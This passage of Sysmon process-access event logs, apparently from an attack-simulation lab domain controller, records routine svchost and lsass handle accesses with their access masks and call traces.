{E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.256","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":861,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.256\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.256","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":862,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.256\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.256","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":863,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.256\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.256","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":864,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.256\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.256","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":865,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.256\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.256","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":866,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.272\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.272","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":867,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.272\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.272","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":868,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.272\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 